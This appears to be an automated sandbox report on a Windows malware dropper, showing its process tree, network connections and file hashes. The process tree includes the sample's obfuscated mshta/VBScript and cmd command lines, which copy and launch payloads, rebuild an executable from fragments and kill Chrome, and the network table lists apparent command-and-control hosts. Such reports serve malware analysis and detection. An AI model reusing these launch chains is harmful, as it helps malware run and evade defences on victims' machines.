C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4712 -ip 4712
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cd42a7c874e44.exe
Tue19cd42a7c874e44.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe
Tue19b4b38a7569a9.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe
Tue1932df4dae.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue197e9ec0ff0.exe
Tue197e9ec0ff0.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cef5687a.exe
Tue19cef5687a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe
Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c9e031f4.exe
Tue19c9e031f4.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19ac3c92c21.exe
Tue19ac3c92c21.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe
Tue193e530416b51740a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe
Tue1968b7ee9058232e8.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe
Tue193129b31e741ef3.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe
Tue196397c0f84f8.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue192c34b1c2f5.exe
Tue192c34b1c2f5.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c28f648204dbd4.exe
Tue19c28f648204dbd4.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe
Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp" /SL5="$C0068,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 620
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-7U75N.tmp\Tue196397c0f84f8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7U75N.tmp\Tue196397c0f84f8.tmp" /SL5="$20230,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4088 -ip 4088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 360
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "Tue1932df4dae.exe" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fffd772cc40,0x7fffd772cc4c,0x7fffd772cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1948 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2200,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2176 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2280 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4600,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4544 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3712,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4712 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4688 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4952,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4948 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5028,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4928 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3748,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2856 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3468,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3804 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2128,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2108 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3908,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2100 /prefetch:2
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3552,i,14640747440211676050,9857495874193813755,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3480 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | marianu.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | telegatt.top | udp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | propanla.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 172.217.16.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| N/A | 127.0.0.1:54599 | tcp | |
| N/A | 127.0.0.1:54603 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| GB | 142.250.179.234:443 | ogads-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| GB | 142.250.179.234:443 | ogads-pa.googleapis.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 216.58.213.1:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| US | 8.8.8.8:53 | telegka.top | udp |
| FR | 51.178.186.149:80 | tcp | |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | 1.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 183.223.178.107.in-addr.arpa | udp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | 82.190.18.2.in-addr.arpa | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 104.155.138.21:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 72.84.118.132:8080 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.75:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.155.138.21:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | telegin.top | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | telegin.top | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | telegin.top | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe
| MD5 | c10ba859e90df8a8d8e7dcc8dfe5ac20 |
| SHA1 | 92d43cc9db4e8e70d0eaf7f3406bad818f4a27c5 |
| SHA256 | 6c77a4d421de0321d74ec8d3fca02e782ac035ef471b1218471f139557e3a023 |
| SHA512 | 00fd1f5656cac70d0c769c8752d52a46f5ef3f93a10ee87f5e8ee63edd20e2d9c22cbf4f6123a835c701b432527821731e6bbc0b42b0fa5e41a52ca232d28d2a |
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/4712-74-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4712-73-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4712-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe
| MD5 | a2326dff5589a00ed3fd40bc1bd0f037 |
| SHA1 | 66c3727fb030f5e1d931de28374cf20e4693bbf4 |
| SHA256 | 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c |
| SHA512 | fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826 |
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe
| MD5 | c90e5a77dd1e7e03d51988bdb057bd9f |
| SHA1 | 498bd4b07d9e11133943e63c2cf06e28d9e99fc5 |
| SHA256 | cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54 |
| SHA512 | bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34 |
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c9e031f4.exe
| MD5 | 0b67130e7f04d08c78cb659f54b20432 |
| SHA1 | 669426ae83c4a8eacf207c7825168aca30a37ca2 |
| SHA256 | bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac |
| SHA512 | 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79 |
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19ac3c92c21.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
